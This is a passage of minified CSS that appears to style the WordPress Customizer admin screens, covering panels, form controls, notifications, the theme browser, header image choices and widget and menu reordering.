p:last-child{margin-bottom:0}#customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child{border-bottom:1px solid #dcdcde;padding:12px}.ios #customize-theme-controls .customize-themes-panel h3.customize-section-title:first-child{padding:12px 12px 13px}.customize-section-title h3,h3.customize-section-title{padding:10px 10px 12px 14px;margin:0;line-height:21px;color:#50575e}.accordion-sub-container.control-panel-content{display:none;position:absolute;top:0;width:100%}.accordion-sub-container.control-panel-content.busy{display:block}.current-panel .accordion-sub-container.control-panel-content{width:100%}.customize-controls-close{display:block;position:absolute;top:0;left:0;width:45px;height:41px;padding:0 2px 0 0;background:#f0f0f1;border:none;border-top:4px solid #f0f0f1;border-right:1px solid #dcdcde;color:#3c434a;text-align:left;cursor:pointer;box-sizing:content-box}@media (prefers-reduced-motion:no-preference){.customize-controls-close{transition:color .15s ease-in-out,border-color .15s ease-in-out,background .15s ease-in-out}}.customize-panel-back,.customize-section-back{display:block;float:left;width:48px;height:71px;padding:0 24px 0 0;margin:0;background:#fff;border:none;border-right:1px solid #dcdcde;border-left:4px solid #fff;box-shadow:none;cursor:pointer;transition:color .15s ease-in-out,border-color .15s ease-in-out,background .15s ease-in-out}.customize-section-back{height:74px}.ios .customize-panel-back{display:none}.ios .expanded.in-sub-panel .customize-panel-back{display:block}#customize-controls .panel-meta.customize-info .accordion-section-title{margin-left:48px;border-left:none}#customize-controls .cannot-expand:hover .accordion-section-title,#customize-controls .panel-meta.customize-info .accordion-section-title:hover{background:#fff;color:#50575e;border-left-color:#fff}.customize-controls-close:focus,.customize-controls-close:hover,.customize-controls-preview-toggle:focus,.customize-controls-preview-toggle:hover{background:#fff;box-shadow:none;outline:1px solid transparent}#customize-theme-controls .accordion-section-title:focus .customize-action{outline:1px solid transparent;outline-offset:1px}.customize-panel-back:focus,.customize-panel-back:hover,.customize-section-back:focus,.customize-section-back:hover{background:#f6f7f7;box-shadow:none;outline:2px solid transparent;outline-offset:-2px}.customize-controls-close:before{font:normal 22px/45px dashicons;content:"\f335";content:"\f335"/'';position:relative;top:-3px;left:13px}.customize-panel-back:before,.customize-section-back:before{font:normal 20px/72px dashicons;content:"\f341";content:"\f341"/'';position:relative;left:9px}.wp-full-overlay-sidebar .wp-full-overlay-header{background-color:#f0f0f1;transition:padding ease-in-out .18s}.in-sub-panel .wp-full-overlay-sidebar .wp-full-overlay-header{padding-left:62px}p.customize-section-description{font-style:normal;margin-top:22px;margin-bottom:0}.customize-section-description ul{margin-left:1em}.customize-section-description ul>li{list-style:disc}.section-description-buttons{text-align:right}.customize-control{width:100%;float:left;clear:both;margin-bottom:12px}.customize-control input[type=email],.customize-control input[type=number],.customize-control input[type=password],.customize-control input[type=range],.customize-control input[type=search],.customize-control input[type=tel],.customize-control input[type=text],.customize-control input[type=url]{width:100%;margin:0}.customize-control-hidden{margin:0}.customize-control-textarea textarea{width:100%;resize:vertical}.customize-control select{width:100%}.customize-control select[multiple]{height:auto}.customize-control-title{display:block;font-size:14px;line-height:1.75;font-weight:600;margin-bottom:4px}.customize-control-description{display:block;font-style:italic;line-height:1.4;margin-top:0;margin-bottom:5px}.customize-section-description a.external-link:after{font:16px/11px dashicons;content:"\f504";content:"\f504"/'';top:3px;position:relative;padding-left:3px;display:inline-block;text-decoration:none}.customize-control-color .color-picker,.customize-control-upload div{line-height:28px}.customize-control .customize-inside-control-row{line-height:1.6;display:block;margin-left:24px;padding-top:6px;padding-bottom:6px}.customize-control-checkbox input,.customize-control-nav_menu_auto_add input,.customize-control-radio input{margin-right:4px;margin-left:-24px}.customize-control-radio{padding:5px 0 10px}.customize-control-radio .customize-control-title{margin-bottom:0;line-height:1.6}.customize-control-radio .customize-control-title+.customize-control-description{margin-top:7px}.customize-control-checkbox label,.customize-control-radio label{vertical-align:top}.customize-control .attachment-thumb.type-icon{float:left;margin:10px;width:auto}.customize-control .attachment-title{font-weight:600;margin:0;padding:5px 10px}.customize-control .attachment-meta{white-space:nowrap;overflow:hidden;text-overflow:ellipsis;margin:0;padding:0 10px}.customize-control .attachment-meta-title{padding-top:7px}.customize-control .thumbnail-image,.customize-control .wp-media-wrapper.wp-video,.customize-control-header .current{line-height:0}.customize-control .thumbnail-image img{cursor:pointer}#customize-controls .thumbnail-audio .thumbnail{max-width:64px;max-height:64px;margin:10px;float:left}#available-menu-items .accordion-section-content .new-content-item-wrapper,.customize-control-dropdown-pages .new-content-item-wrapper{width:calc(100% - 30px);padding:8px 15px;position:absolute;bottom:0;z-index:10;background:#f0f0f1}.customize-control-dropdown-pages .new-content-item-wrapper{width:100%;padding:0;position:static}#available-menu-items .new-content-item-wrapper>label,.customize-control-dropdown-pages .new-content-item-wrapper>label{margin-bottom:4px;display:block}#available-menu-items .accordion-section-content .new-content-item,.customize-control-dropdown-pages .new-content-item{display:flex}.customize-control-dropdown-pages .new-content-item{width:100%;padding:5px 0 5px 1px;position:relative}.customize-control-dropdown-pages .new-content-item-wrapper .new-content-item{padding:0}.customize-control-dropdown-pages .new-content-item-wrapper .new-content-item label{line-height:1.6}#available-menu-items .new-content-item .create-item-input,.customize-control-dropdown-pages .new-content-item .create-item-input{flex-grow:10;width:100%}#available-menu-items .new-content-item .create-item-input{min-height:32px;line-height:2.15384615}#available-menu-items .new-content-item .add-content,.customize-control-dropdown-pages .new-content-item .add-content{margin:0 0 0 6px;flex-grow:1}#available-menu-items .new-content-item .add-content{min-height:32px;line-height:2.30769231}.customize-control-dropdown-pages .new-content-item .create-item-input.invalid{border:1px solid #d63638}.customize-control-dropdown-pages .add-new-toggle{margin-left:1px;font-weight:600;line-height:2.2}#customize-preview iframe{width:100%;height:100%;position:absolute}#customize-preview iframe+iframe{visibility:hidden}.wp-full-overlay-sidebar{background:#f0f0f1;border-right:1px solid #dcdcde}#customize-controls .customize-control-notifications-container{margin:4px 0 8px;padding:0;cursor:default}#customize-controls .customize-control-widget_form.has-error .widget .widget-top,.customize-control-nav_menu_item.has-error .menu-item-bar .menu-item-handle{box-shadow:inset 0 0 0 2px #d63638;transition:.15s box-shadow linear}#customize-controls .customize-control-notifications-container li.notice{list-style:none;margin:0 0 6px;padding:9px 14px;overflow:hidden}#customize-controls .customize-control-notifications-container .notice.is-dismissible{padding-right:38px}.customize-control-notifications-container li.notice:last-child{margin-bottom:0}#customize-controls .customize-control-nav_menu_item .customize-control-notifications-container{margin-top:0}#customize-controls .customize-control-widget_form .customize-control-notifications-container{margin-top:8px}.customize-control-text.has-error input{outline:2px solid #d63638}#customize-controls #customize-notifications-area{position:absolute;top:46px;width:100%;border-bottom:1px solid #dcdcde;display:block;padding:0;margin:0}.wp-full-overlay.collapsed #customize-controls #customize-notifications-area{display:none!important}#customize-controls #customize-notifications-area:not(.has-overlay-notifications),#customize-controls .customize-section-title>.customize-control-notifications-container:not(.has-overlay-notifications),#customize-controls .panel-meta>.customize-control-notifications-container:not(.has-overlay-notifications){max-height:210px;overflow-x:hidden;overflow-y:auto}#customize-controls #customize-notifications-area .notice,#customize-controls #customize-notifications-area>ul,#customize-controls .customize-section-title>.customize-control-notifications-container,#customize-controls .customize-section-title>.customize-control-notifications-container .notice,#customize-controls .panel-meta>.customize-control-notifications-container,#customize-controls .panel-meta>.customize-control-notifications-container .notice{margin:0}#customize-controls .customize-section-title>.customize-control-notifications-container,#customize-controls .panel-meta>.customize-control-notifications-container{border-top:1px solid #dcdcde}#customize-controls #customize-notifications-area .notice,#customize-controls .customize-section-title>.customize-control-notifications-container .notice,#customize-controls .panel-meta>.customize-control-notifications-container .notice{padding:9px 14px}#customize-controls #customize-notifications-area .notice.is-dismissible,#customize-controls .customize-section-title>.customize-control-notifications-container .notice.is-dismissible,#customize-controls .panel-meta>.customize-control-notifications-container .notice.is-dismissible{padding-right:38px}#customize-controls #customize-notifications-area .notice+.notice,#customize-controls .customize-section-title>.customize-control-notifications-container .notice+.notice,#customize-controls .panel-meta>.customize-control-notifications-container .notice+.notice{margin-top:1px}@keyframes customize-fade-in{0%{opacity:0}100%{opacity:1}}#customize-controls #customize-notifications-area .notice.notification-overlay,#customize-controls .notice.notification-overlay{margin:0;border-left:0}#customize-controls .customize-control-notifications-container.has-overlay-notifications{animation:customize-fade-in .5s;z-index:30}#customize-controls #customize-notifications-area .notice.notification-overlay .notification-message{clear:both;color:#1d2327;font-size:18px;font-style:normal;margin:0;padding:2em 0;text-align:center;width:100%;display:block;top:50%;position:relative}#customize-control-show_on_front.has-error{margin-bottom:0}#customize-control-show_on_front.has-error .customize-control-notifications-container{margin-top:12px}.accordion-section .dropdown{float:left;display:block;position:relative;cursor:pointer}.accordion-section .dropdown-content{overflow:hidden;float:left;min-width:30px;height:16px;line-height:16px;margin-right:16px;padding:4px 5px;border:2px solid #f0f0f1;-webkit-user-select:none;user-select:none}.customize-control .dropdown-arrow{position:absolute;top:0;bottom:0;right:0;width:20px;background:#f0f0f1}.customize-control .dropdown-arrow:after{content:"\f140";content:"\f140"/'';font:normal 20px/1 dashicons;display:block;padding:0;text-indent:0;text-align:center;position:relative;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;text-decoration:none!important;color:#2c3338}.customize-control .dropdown-status{color:#2c3338;background:#f0f0f1;display:none;max-width:112px}.customize-control-color .dropdown{margin-right:5px;margin-bottom:5px}.customize-control-color .dropdown .dropdown-content{background-color:#50575e;border:1px solid rgba(0,0,0,.15)}.customize-control-color .dropdown:hover .dropdown-content{border-color:rgba(0,0,0,.25)}.ios .wp-full-overlay{position:relative}.ios #customize-controls .wp-full-overlay-sidebar-content{-webkit-overflow-scrolling:touch}.customize-control .actions .button{margin-top:12px}.customize-control-header .actions,.customize-control-header .uploaded{margin-bottom:18px}.customize-control-header .default button:not(.random),.customize-control-header .uploaded button:not(.random){width:100%;padding:0;margin:0;background:0 0;border:none;color:inherit;cursor:pointer}.customize-control-header button img{display:block}.customize-control .attachment-media-view .default-button,.customize-control .attachment-media-view .remove-button,.customize-control .attachment-media-view .upload-button,.customize-control-header button.new,.customize-control-header button.remove{width:auto;height:auto;white-space:normal}.customize-control .attachment-media-view .upload-button{width:100%;text-align:center}.customize-control .attachment-media-view .upload-button.control-focus{width:auto}.customize-control.customize-control-header .actions .upload-button.button.new{width:100%;text-align:center}.customize-control .attachment-media-view .thumbnail,.customize-control-header .current .container{overflow:hidden}.customize-control .attachment-media-view .button-add-media,.customize-control .attachment-media-view .placeholder,.customize-control-header .placeholder{width:100%;position:relative;text-align:center;cursor:default;border:1px dashed #c3c4c7;box-sizing:border-box;padding:9px 0;line-height:1.6}.customize-control .attachment-media-view .button-add-media{cursor:pointer;background-color:#f0f0f1;color:#2c3338}.customize-control .attachment-media-view .button-add-media:hover{background-color:#fff}.customize-control .attachment-media-view .button-add-media:focus{background-color:#fff;border-color:#3582c4;border-style:solid;box-shadow:0 0 0 1px #3582c4;outline:2px solid transparent}.customize-control-header .inner{display:none;position:absolute;width:100%;color:#50575e;white-space:nowrap;text-overflow:ellipsis;overflow:hidden}.customize-control-header .inner,.customize-control-header .inner .dashicons{line-height:20px;top:8px}.customize-control-header .list .inner,.customize-control-header .list .inner .dashicons{top:9px}.customize-control-header .header-view{position:relative;width:100%;margin-bottom:12px}.customize-control-header .header-view:last-child{margin-bottom:0}.customize-control-header .header-view:after{border:0}.customize-control-header .header-view.selected .choice:focus{outline:0}.customize-control-header .header-view.selected:after{content:"";position:absolute;height:auto;top:0;left:0;bottom:0;right:0;border:4px solid #72aee6;border-radius:2px}.customize-control-header .header-view.button.selected{border:0}.customize-control-header .uploaded .header-view .close{font-size:20px;color:#fff;background:#50575e;background:rgba(0,0,0,.5);position:absolute;top:10px;left:-999px;z-index:1;width:26px;height:26px;cursor:pointer}.customize-control-header .header-view .close:focus,.customize-control-header .header-view:hover .close{left:auto;right:10px}.customize-control-header .header-view .close:focus{outline:1px solid #4f94d4}.customize-control-header .random.placeholder{cursor:pointer;border-radius:2px;height:40px}.customize-control-header button.random{width:100%;height:auto;min-height:40px;white-space:normal}.customize-control-header button.random .dice{margin-top:0}.customize-control-header .header-view:hover>button.random .dice,.customize-control-header .placeholder:hover .dice{animation:dice-color-change 3s infinite}.button-see-me{animation:bounce .7s 1;transform-origin:center bottom}@keyframes bounce{20%,53%,80%,from,to{animation-timing-function:cubic-bezier(0.215,0.610,0.355,1.000);transform:translate3d(0,0,0)}40%,43%{animation-timing-function:cubic-bezier(0.755,0.050,0.855,0.060);transform:translate3d(0,-12px,0)}70%{animation-timing-function:cubic-bezier(0.755,0.050,0.855,0.060);transform:translate3d(0,-6px,0)}90%{transform:translate3d(0,-1px,0)}}.customize-control-header .choice{position:relative;display:block;margin-bottom:9px}.customize-control-header .choice:focus{box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}.customize-control-header .uploaded div:last-child>.choice{margin-bottom:0}.customize-control .attachment-media-view .thumbnail-image img,.customize-control-header img{max-width:100%}.customize-control .attachment-media-view .default-button,.customize-control .attachment-media-view .remove-button,.customize-control-header .remove{margin-right:8px}.customize-control-background_position .background-position-control .button-group{display:block}.customize-control-code_editor textarea{width:100%;font-family:Consolas,Monaco,monospace;font-size:12px;padding:6px 8px;tab-size:2}.customize-control-code_editor .CodeMirror,.customize-control-code_editor textarea{height:14em}#customize-controls .customize-section-description-container.section-meta.customize-info{border-bottom:none}#sub-accordion-section-custom_css .customize-control-notifications-container{margin-bottom:15px}#customize-control-custom_css textarea{display:block;height:500px}.customize-section-description-container+#customize-control-custom_css .customize-control-title{margin-left:12px}.customize-section-description-container+#customize-control-custom_css:last-child textarea{border-right:0;border-left:0;height:calc(100vh - 185px);resize:none}.customize-section-description-container+#customize-control-custom_css:last-child{margin-left:-12px;width:299px;width:calc(100% + 24px);margin-bottom:-12px}.customize-section-description-container+#customize-control-custom_css:last-child .CodeMirror{height:calc(100vh - 185px)}.CodeMirror-hints,.CodeMirror-lint-tooltip{z-index:500000!important}.customize-section-description-container+#customize-control-custom_css:last-child .customize-control-notifications-container{margin-left:12px;margin-right:12px}.theme-browser .theme.active .theme-actions,.wp-customizer .theme-browser .theme .theme-actions{padding:9px 15px}.theme-browser .theme:not(.active) .theme-actions{box-shadow:inset 0 1px 0 rgba(0,0,0,.1)}@media screen and (max-width:640px){.customize-section-description-container+#customize-control-custom_css:last-child{margin-right:0}.customize-section-description-container+#customize-control-custom_css:last-child textarea{height:calc(100vh - 140px)}}#customize-theme-controls .control-panel-themes{border-bottom:none}#customize-theme-controls .control-panel-themes>.accordion-section-title,#customize-theme-controls .control-panel-themes>.accordion-section-title:hover{cursor:default;background:#fff;color:#50575e;border-top:1px solid #dcdcde;border-bottom:1px solid #dcdcde;border-left:none;border-right:none;margin:0 0 15px;padding:12px 100px 15px 15px}#customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child,#customize-theme-controls .control-section-themes .customize-themes-panel .accordion-section-title:first-child:hover{border-top:0}#customize-theme-controls .control-section-themes>.accordion-section-title,#customize-theme-controls .control-section-themes>.accordion-section-title:hover{margin:0 0 15px}#customize-controls .customize-themes-panel .accordion-section-title,#customize-controls .customize-themes-panel .accordion-section-title:hover{margin:15px -8px}#customize-controls .control-section-themes .accordion-section-title,#customize-controls .customize-themes-panel .accordion-section-title{padding-right:100px}#customize-controls .control-section-themes .accordion-section-title span.customize-action,#customize-controls .customize-section-title span.customize-action,.control-panel-themes .accordion-section-title span.customize-action{font-size:13px;display:block;font-weight:400}#customize-theme-controls .control-panel-themes .accordion-section-title .change-theme{position:absolute;right:10px;top:50%;margin-top:-20px;font-weight:400}#customize-notifications-area .notification-message button.switch-to-editor{display:block;margin-top:6px;font-weight:400}#customize-theme-controls .control-panel-themes>.accordion-section-title:after{display:none}.control-panel-themes .customize-themes-full-container{position:fixed;top:0;left:0;transition:.18s left ease-in-out;margin:0 0 0 300px;padding:71px 0 25px;overflow-y:scroll;width:calc(100% - 300px);height:calc(100% - 96px);background:#f0f0f1;z-index:20}@media (prefers-reduced-motion:reduce){.control-panel-themes .customize-themes-full-container{transition:none}}@media screen and (min-width:1670px){.control-panel-themes .customize-themes-full-container{width:82%;right:0;left:initial}}.modal-open .control-panel-themes .customize-themes-full-container{overflow-y:visible}#customize-header-actions .customize-controls-preview-toggle,#customize-header-actions .spinner,#customize-save-button-wrapper{transition:.18s margin ease-in-out}#customize-footer-actions,#customize-footer-actions .collapse-sidebar{bottom:0;transition:.18s bottom ease-in-out}.in-themes-panel:not(.animating) #customize-footer-actions,.in-themes-panel:not(.animating) #customize-header-actions .customize-controls-preview-toggle,.in-themes-panel:not(.animating) #customize-header-actions .spinner,.in-themes-panel:not(.animating) #customize-preview{visibility:hidden}.wp-full-overlay.in-themes-panel{background:#f0f0f1}.in-themes-panel #customize-header-actions .customize-controls-preview-toggle,.in-themes-panel #customize-header-actions .spinner,.in-themes-panel #customize-save-button-wrapper{margin-top:-46px}.in-themes-panel #customize-footer-actions,.in-themes-panel #customize-footer-actions .collapse-sidebar{bottom:-45px}.in-themes-panel.animating .control-panel-themes .filter-themes-count{display:none}.in-themes-panel.wp-full-overlay .wp-full-overlay-sidebar-content{bottom:0}.themes-filter-bar .feature-filter-toggle{min-height:32px;line-height:2.30769231}.themes-filter-bar .feature-filter-toggle:before{content:"\f111";content:"\f111"/'';margin:0 5px 0 0;font:normal 16px/1 dashicons;vertical-align:text-bottom;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.themes-filter-bar .feature-filter-toggle.open{background:#f0f0f1;border-color:#8c8f94;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5)}.themes-filter-bar .feature-filter-toggle .filter-count-filters{display:none}.filter-drawer{box-sizing:border-box;width:100%;position:absolute;top:46px;left:0;padding:25px 0 25px 25px;border-top:0;margin:0;background:#f0f0f1;border-bottom:1px solid #dcdcde}.filter-drawer .filter-group{margin:0 25px 0 0;width:calc((100% - 75px)/ 3);min-width:200px;max-width:320px}@keyframes themes-fade-in{0%{opacity:0}50%{opacity:0}100%{opacity:1}}.control-panel-themes .customize-themes-full-container.animate{animation:.6s themes-fade-in 1}.in-themes-panel:not(.animating) .control-panel-themes .filter-themes-count{animation:.6s themes-fade-in 1}.control-panel-themes .filter-themes-count .themes-displayed{font-weight:600;color:#50575e}.customize-themes-notifications{margin:0}.control-panel-themes .customize-themes-notifications .notice{margin:0 0 25px}.customize-themes-full-container .customize-themes-section{display:none!important;overflow:hidden}.customize-themes-full-container .customize-themes-section.current-section{display:list-item!important}.control-section .customize-section-text-before{padding:0 0 8px 15px;margin:15px 0 0;line-height:16px;border-bottom:1px solid #dcdcde;color:#50575e}.control-panel-themes .customize-themes-section-title{width:100%;background:#fff;box-shadow:none;outline:0;border-top:none;border-bottom:1px solid #dcdcde;border-left:4px solid #fff;border-right:none;cursor:pointer;padding:10px 15px;position:relative;text-align:left;font-size:14px;font-weight:600;color:#50575e;text-shadow:none}.control-panel-themes #accordion-section-installed_themes{border-top:1px solid #dcdcde}.control-panel-themes .theme-section{margin:0;position:relative}.control-panel-themes .customize-themes-section-title:focus,.control-panel-themes .customize-themes-section-title:hover{background:#f6f7f7}.customize-themes-section-title:not(.selected):after{content:"";display:block;position:absolute;top:9px;right:15px;width:18px;height:18px;border-radius:100%;border:1px solid #c3c4c7;background:#fff}.control-panel-themes .theme-section .customize-themes-section-title.selected:after{content:"\f147";content:"\f147"/'';font:16px/1 dashicons;box-sizing:border-box;width:20px;height:20px;padding:3px 3px 1px 1px;border-radius:100%;position:absolute;top:9px;right:15px;color:#fff}#customize-theme-controls .themes.accordion-section-content{position:relative;left:0;padding:0;width:100%}.loading .customize-themes-section .spinner{display:block;visibility:visible;position:relative;clear:both;width:20px;height:20px;left:calc(50% - 10px);float:none;margin-top:50px}.customize-themes-section .no-themes,.customize-themes-section .no-themes-local{display:none}.themes-section-installed_themes .theme .notice-success:not(.updated-message){display:none}.customize-control-theme .theme{width:100%;margin:0;border:1px solid #dcdcde;background:#fff}.customize-control-theme .theme .theme-actions,.customize-control-theme .theme .theme-name{background:#fff;border:none}.customize-control.customize-control-theme{box-sizing:border-box;width:25%;max-width:600px;margin:0 25px 25px 0;padding:0;clear:none}@media screen and (min-width:2101px){.customize-control.customize-control-theme{width:calc((100% - 125px)/ 5 - 1px)}}@media screen and (min-width:1601px) and (max-width:2100px){.customize-control.customize-control-theme{width:calc((100% - 100px)/ 4 - 1px)}}@media screen and (min-width:1201px) and (max-width:1600px){.customize-control.customize-control-theme{width:calc((100% - 75px)/ 3 - 1px)}}@media screen and (min-width:851px) and (max-width:1200px){.customize-control.customize-control-theme{width:calc((100% - 50px)/ 2 - 1px)}}@media screen and (max-width:850px){.customize-control.customize-control-theme{width:100%}}.wp-customizer .theme-browser .themes{padding:0 0 25px 25px;transition:.18s margin-top linear}.wp-customizer .theme-browser .theme .theme-actions{opacity:1}#customize-controls h3.theme-name{font-size:15px}#customize-controls .theme-overlay .theme-name{font-size:32px}.customize-preview-header.themes-filter-bar{position:fixed;top:0;left:300px;width:calc(100% - 300px);height:46px;background:#f0f0f1;z-index:10;padding:6px 25px;box-sizing:border-box;border-bottom:1px solid #dcdcde}.customize-preview-header.themes-filter-bar,.customize-preview-header.themes-filter-bar .search-form{display:flex;align-items:center;gap:10px;flex-wrap:wrap}.customize-preview-header.themes-filter-bar .search-form-input{position:relative}.customize-preview-header .filter-themes-wrapper{display:grid;align-items:center;gap:10px;grid-template-columns:auto 1fr}.customize-preview-header .filter-themes-wrapper .filter-themes-count{justify-self:end}@media screen and (min-width:1670px){.customize-preview-header.themes-filter-bar{width:82%;right:0;left:initial}}.themes-filter-bar .themes-filter-container{margin:0;padding:0;display:flex;align-items:center;gap:10px}.themes-filter-bar .wp-filter-search{padding:0 10px 0 30px;max-width:100%;width:40%;min-width:300px;height:32px;min-height:32px;margin:1px 0;top:0;left:0}@media screen and (max-height:540px),screen and (max-width:1018px){.customize-preview-header.themes-filter-bar{position:relative;left:0;width:100%;margin:0 0 25px}.filter-drawer{top:46px}.wp-customizer .theme-browser .themes{padding:0 0 25px 25px;overflow:hidden}.control-panel-themes .customize-themes-full-container{margin-top:0;padding:0;height:100%;width:calc(100% - 300px)}}@media screen and (max-width:1018px){.filter-drawer .filter-group{width:calc((100% - 50px)/ 2)}}@media screen and (max-width:960px){.customize-preview-header.themes-filter-bar{height:96px}}@media screen and (max-width:900px){.themes-filter-bar .wp-filter-search{width:100%;margin:0;min-width:200px}.customize-preview-header.themes-filter-bar,.customize-preview-header.themes-filter-bar .search-form .themes-filter-bar .themes-filter-container{display:grid;gap:4px}.customize-preview-header.themes-filter-bar .search-form-input{display:flex;flex-grow:1}.filter-drawer{top:86px}.control-panel-themes .filter-themes-count{float:left}}@media screen and (max-width:792px){.filter-drawer .filter-group{width:calc(100% - 25px)}}.control-panel-themes .customize-themes-mobile-back{display:none}@media screen and (max-width:600px){.filter-drawer{top:132px}.wp-full-overlay.showing-themes .control-panel-themes .filter-themes-count .filter-themes{display:block;float:right}.control-panel-themes .customize-themes-full-container{width:100%;margin:0;padding-top:46px;height:calc(100% - 46px);z-index:1;display:none}.showing-themes .control-panel-themes .customize-themes-full-container{display:block}.wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back{display:block;position:fixed;top:0;left:0;background:#f0f0f1;color:#3c434a;border-radius:0;box-shadow:none;border:none;height:46px;width:100%;z-index:10;text-align:left;text-shadow:none;border-bottom:1px solid #dcdcde;border-left:4px solid transparent;margin:0;padding:0;font-size:0;overflow:hidden}.wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:before{left:0;top:0;height:46px;width:26px;display:block;line-height:2.3;padding:0 8px;border-right:1px solid #dcdcde}.wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:focus,.wp-customizer .showing-themes .control-panel-themes .customize-themes-mobile-back:hover{background:#f6f7f7;box-shadow:none;outline:2px solid transparent;outline-offset:-2px}.showing-themes #customize-header-actions{display:none}#customize-controls{width:100%}}.wp-customizer .theme-overlay{display:none}.wp-customizer.modal-open .theme-overlay{position:fixed;left:0;top:0;right:0;bottom:0;z-index:109}.wp-customizer.modal-open #customize-header-actions,.wp-customizer.modal-open .control-panel-themes .customize-themes-section-title.selected:after,.wp-customizer.modal-open .control-panel-themes .filter-themes-count{z-index:-1}.wp-full-overlay.in-themes-panel.themes-panel-expanded #customize-controls .wp-full-overlay-sidebar-content{overflow:visible}.wp-customizer .theme-overlay .theme-backdrop{background:rgba(240,240,241,.75);position:fixed;z-index:110}.wp-customizer .theme-overlay .star-rating{float:left;margin-right:8px}.wp-customizer .theme-rating .num-ratings{line-height:20px}.wp-customizer .theme-overlay .theme-wrap{left:90px;right:90px;top:45px;bottom:45px;z-index:120}.wp-customizer .theme-overlay .theme-actions{text-align:right;padding:10px 25px 5px;background:#f0f0f1;border-top:1px solid #dcdcde}.wp-customizer .theme-overlay .theme-actions .theme-install.preview{margin-left:8px}.modal-open .in-themes-panel #customize-controls .wp-full-overlay-sidebar-content{overflow:visible}.wp-customizer .theme-header{background:#f0f0f1}.wp-customizer .theme-overlay .theme-header .close:before,.wp-customizer .theme-overlay .theme-header button{color:#3c434a}.wp-customizer .theme-overlay .theme-header .close:focus,.wp-customizer .theme-overlay .theme-header .close:hover,.wp-customizer .theme-overlay .theme-header .left:focus,.wp-customizer .theme-overlay .theme-header .left:hover,.wp-customizer .theme-overlay .theme-header .right:focus,.wp-customizer .theme-overlay .theme-header .right:hover{background:#fff}.wp-customizer .theme-overlay .theme-header .close:focus:before,.wp-customizer .theme-overlay .theme-header .close:hover:before{color:var(--wp-admin-theme-color)}.wp-customizer .theme-overlay .theme-header button.disabled,.wp-customizer .theme-overlay .theme-header button.disabled:focus,.wp-customizer .theme-overlay .theme-header button.disabled:hover{border-bottom:none;background:0 0;color:#c3c4c7}@media (max-width:850px),(max-height:472px){.wp-customizer .theme-overlay .theme-wrap{left:0;right:0;top:0;bottom:0}.wp-customizer .theme-browser .themes{padding-right:25px}}body.cheatin{font-size:medium;height:auto;background:#fff;border:1px solid #c3c4c7;margin:50px auto 2em;padding:1em 2em;max-width:700px;min-width:0;box-shadow:0 1px 1px rgba(0,0,0,.04)}body.cheatin h1{border-bottom:1px solid #dcdcde;clear:both;color:#50575e;font-size:24px;font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;margin:30px 0 0;padding:0 0 7px}body.cheatin p{font-size:14px;line-height:1.5;margin:25px 0 20px}#customize-theme-controls .add-new-menu-item,#customize-theme-controls .add-new-widget{cursor:pointer;float:right;margin:0 0 0 10px;transition:all .2s;-webkit-user-select:none;user-select:none;outline:0}.reordering .add-new-menu-item,.reordering .add-new-widget{opacity:.2;pointer-events:none;cursor:not-allowed}#available-menu-items .new-content-item .add-content:before,.add-new-menu-item:before,.add-new-widget:before{content:"\f132";content:"\f132"/'';display:inline-block;position:relative;left:-2px;top:0;font:normal 20px/1 dashicons;vertical-align:middle;transition:all .2s;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.reorder-toggle{float:right;padding:5px 8px;text-decoration:none;cursor:pointer;outline:0}.reorder,.reordering .reorder-done{display:block;padding:5px 8px}.reorder-done,.reordering .reorder{display:none}.menu-item-reorder-nav button,.widget-reorder-nav span{position:relative;overflow:hidden;float:left;display:block;width:33px;height:43px;color:#8c8f94;text-indent:-9999px;cursor:pointer;outline:0}.menu-item-reorder-nav button{width:30px;height:40px;background:0 0;border:none;box-shadow:none}.menu-item-reorder-nav button:before,.widget-reorder-nav span:before{display:inline-block;position:absolute;top:0;right:0;width:100%;height:100%;font:normal 20px/43px dashicons;text-align:center;text-indent:0;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.menu-item-reorder-nav button:focus,.menu-item-reorder-nav button:hover,.widget-reorder-nav span:focus,.widget-reorder-nav span:hover{color:#1d2327;background:#f0f0f1}.menus-move-down:before,.move-widget-down:before{content:"\f347";content:"\f347"/''}.menus-move-up:before,.move-widget-up:before{content:"\f343";content:"\f343"/''}#customize-theme-controls .first-widget .move-widget-up,#customize-theme-controls .last-widget .move-widget-down,.move-down-disabled .menus-move-down,.move-left-disabled .menus-move-left,.move-right-disabled .menus-move-right,.move-up-disabled .menus-move-up{color:#dcdcde;background-color:#fff;cursor:default;pointer-events:none}.wp-full-overlay-main{right:auto;width:100%}.add-menu-toggle.open,.add-menu-toggle.open:hover,.adding-menu-items .add-new-menu-item,.adding-menu-items .add-new-menu-item:hover,body.adding-widget .add-new-widget,body.adding-widget .add-new-widget:hover{background:#f0f0f1;border-color:#8c8f94;color:#2c3338;box-shadow:inset 0 2px 5px -3px rgba(0,0,0,.5)}#accordion-section-add_menu .add-new-menu-item.open:before,.adding-menu-items .add-new-menu-item:before,body.adding-widget .add-new-widget:before{transform:rotate(45deg)}#available-menu-items,#available-widgets{position:absolute;top:0;bottom:0;left:-301px;visibility:hidden;overflow-x:hidden;overflow-y:auto;width:300px;margin:0;z-index:4;background:#f0f0f1;transition:left .18s;border-right:1px solid #dcdcde}#available-menu-items .accordion-section-title,#available-widgets .accordion-section-title{z-index:2}#available-menu-items .customize-section-title,#available-widgets .customize-section-title{border:0;clip-path:inset(50%);height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;word-wrap:normal!important;word-break:normal!important}#available-menu-items .customize-section-title button,#available-widgets .customize-section-title button{display:none}#available-widgets-list{top:82px;position:absolute;overflow:auto;bottom:0;width:100%;border-top:1px solid #dcdcde}.no-widgets-found #available-widgets-list{border-top:none}#available-widgets-filter{position:fixed;top:0;z-index:1;width:300px;background:#f0f0f1}#available-menu-items-search .accordion-section-title,#available-widgets-filter{padding:13px 